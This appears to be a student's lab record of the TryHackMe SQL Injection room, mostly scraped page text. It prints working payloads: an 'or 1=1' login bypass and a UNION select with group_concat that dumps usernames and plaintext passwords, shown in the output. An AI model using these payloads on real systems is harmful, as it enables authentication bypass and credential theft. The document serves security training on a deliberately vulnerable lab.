

SQL INJECTION LAB**Aim:**

To do perform SQL Injection Lab in TryHackMe platform to exploit various vulnerabilities.

Algorithm:

1. Access the SQL Injection Lab in TryHackMe platform using the link-
<https://tryhackme.com/r/room/sqlilab>
2. Click Start AttackBox to run the instance of Kalilinux distribution.
3. Perform SQL injection attacks on the following-
 - a) Input Box Non-String
 - b) Input Box String
 - c) URL Injection
 - d) POST Injection
 - e) UPDATE Statement
4. Perform broken authentication of login forms with blind SQL injection to extract admin password
5. Perform UNION-based SQL injection and exploit the vulnerable book search function to retrieve the flag

Output:

SQL Injection 1: Input Box Non-String

Log in

'a' or 1=1 --

Log in

profile Logout

SQL Injection 1: Input Box Non-String

Francois's Profile

Flag	THM{ [REDACTED] }
Employee ID	10
Salary	R250
Passport Number	8605255014084
Nick Name	

Log in

Log in

Profile Logout

SQL Injection 2: Input Box String

Francois's Profile

Flag
Employee ID
Salary
Passport Number
Nick Name
E-mail

THM{
10
R250
8605255014084

Login

10.10.1.134:5000/sesqli3/login?profileID=a&password=a

SQL Injection 3: URL Injection

The account information you provided does not exist!

Log in

Log in

Flag
Employee ID
Salary
Passport Number
Nick Name
E-mail

THM{ [REDACTED] }
10
R250
8605255014084

Log in

10



Log in

Employee ID
Salary
Passport Number
Nick Name
E-mail

10
R250
8605255014084

[Login](#)[Broken Authentication : Blind Injection](#)[\[Main Menu\]](#)

Invalid username or password.

Log in

Log in

[Create an Account](#)

```
' union select '-1''union select
1,group_concat(username),group_concat(password),4 from users-- -
```

[Profile](#) [Logout](#)[Book Title 2](#)[Logged in as](#)

Title: admin,dev,amanda,maja,emil,sam2
THM{[REDACTED]},asd,Summer2019!,345m3io4hj3,viking123,asd
Author: 4

Result: Thus, the various exploits were performed using SQL Injection Attack.